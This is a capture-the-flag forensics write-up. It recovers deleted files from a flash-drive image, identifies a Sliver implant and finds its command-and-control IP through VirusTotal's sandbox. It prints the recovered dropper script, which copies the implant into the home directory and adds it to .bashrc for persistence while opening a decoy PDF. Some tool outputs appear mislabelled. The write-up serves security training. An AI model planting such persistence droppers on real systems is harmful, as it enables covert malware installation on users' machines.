Challenge Overview

The provided file is an image of a flash drive that probably contains a malware. The goal is to find the C2 website.

➜ file drive.img

drive.img: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "mkfs.fat", sectors/cluster 8, Media descriptor 0xf8, sectors/track 63, heads 128, sectors 4194288 (volumes > 32 MB), FAT (32 bit), sectors/FAT 4088, reserved 0x1, serial number 0xcc9e321, unlabeled

We can extract the contents of the image using the testdisk tool. We select the Analyze option to search for files contained in the image.

Testdisk

Several files were deleted but the tool can recover them. We can extract them using the a command to select all and C to copy.

Deleted

We get 5 different files :

➜ file *

_~1.SH:                Bourne-Again shell script, ASCII text executable
_DF~1.PNG:             PNG image data, 36 x 36, 16-bit/color RGB, non-interlace (volumes > 32 MB), FAT (32 bit), sectors/FAT 4088, reserved 0x1, serial number 0xcc9e321, unlabeled
Important.pdf.desktop: ASCII text
_IREFO~1.ELF:          ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
_MPORT~1.PDF:          PDF document, version 1.6 (password protected)

The bash script will copy the firefox.elf file to the user’s home directory and add it to the .bashrc file so that it is executed every time the terminal is opened. And yes ! firefox.elf is a malware !

➜ cat _\~1.SH
#!/bin/bash

echo -e "# Launch the best browser\n~/.firefox &" >> ~/.bashrc
cp ./.firefox.elf ~/.firefox
source ~/.bashrc
evince ./.important.pdf

# rm -rf ./Important.pdf.desktop

Among the recovered files, there is an elf file that seems to be the firefox malware. The strings tool displays a Github link to the following repository :

  • https://github.com/bishopfox/sliver/

Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. Sliver’s implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS and are dynamically compiled with per-binary asymmetric encryption keys.

➜ strings _\~1.SH

PeerFailureType
SEND_FAILURE
DISCONNECT
B/Z-github.com/bishopfox/sliver/protobuf/sliverpbb
proto3
A A!A"A#A$A%A&A'A(A)A*A+A,A-A.A/A0A1A2A3A4A5A6A7A8A9A:A;A<A=A>A?

The malware is a dropper generated with Sliver, so it is very difficult to decompile with Ghidra to determine the C2 address. Another idea is dynamic analysis. The goal is to launch the malware in a sandbox and analyze the network to determine the connections it makes. A free service that can do this is Virustotal (https://www.virustotal.com/). We upload our malware to it and it will do the job.

VirusTotal

The BEHAVIOR tab is the one we are looking for, as the results of the dynamic analysis are here.

We find that the virus has connected to the following IP address :

  • 178.62.67.181

IP 

➜ curl 178.62.67.181:443

<img src="https://i.imgur.com/ZAdeHIb.png" alt="Mewtal Gear Solid">

And there is the flag !

Flag

  • PWNME{1_L0V3_5L1V3R}